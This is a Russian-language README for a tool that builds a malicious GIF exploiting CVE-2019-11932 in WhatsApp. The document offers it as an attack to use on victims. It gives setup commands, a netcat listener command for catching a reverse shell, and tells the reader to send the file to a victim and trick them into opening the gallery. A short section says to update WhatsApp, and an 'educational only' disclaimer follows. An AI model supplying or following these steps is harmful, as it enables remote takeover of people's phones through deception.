WhatsRCE
Это автоматически сгенерированный пейлоад для CVE-2019-11932 (удаленное выполнение кода в WhatsApp)
- Автоматическая установка GCC (безопасная команда, вы можете убедиться, что это открытый исходный код)
- Сохранение в .GIF файл
Как использовать?
sudo apt install git
git clone https://github.com/KeepWannabe/WhatsRCE
cd WhatsRCE && bash start.sh
Как получить шелл?
- Просто отправьте .GIF файл жертве КАК ДОКУМЕНТ, А НЕ КАК ИЗОБРАЖЕНИЕ
- И настройте nc / netcat на порт, который вы указали в инструменте WhatsRCE {nc -lnvp ваш_порт}
- Вы можете использовать социальную инженерию, чтобы жертвы захотели запустить этот эксплойт
- скажите жертве открыть галерею через WhatsApp и отправить любые фотографии (не обязательно, просто нужно зайти в галерею, без проблем), после этого через несколько секунд вы получите шелл-соединение с жертвой
или просто посмотрите это
DEMO VIDEO
https://drive.google.com/file/d/1T-v5XG8yQuiPojeMpOAG6UGr2TYpocIj/view
если ссылка выше недоступна
https://drive.google.com/open?id=1X9nBlf5oj5ef2UoYGOfusjxAiow8nKEK
Как избежать этой атаки?
- Обновите WhatsApp до последней версии (Исправлено в версии 2.19.244)
- как получать любые файлы, включая аудио, изображения и другие, от незнакомых людей
Это только для обучения, последствия и т.д. Если вы используете это для преступления, я не несу ответственности!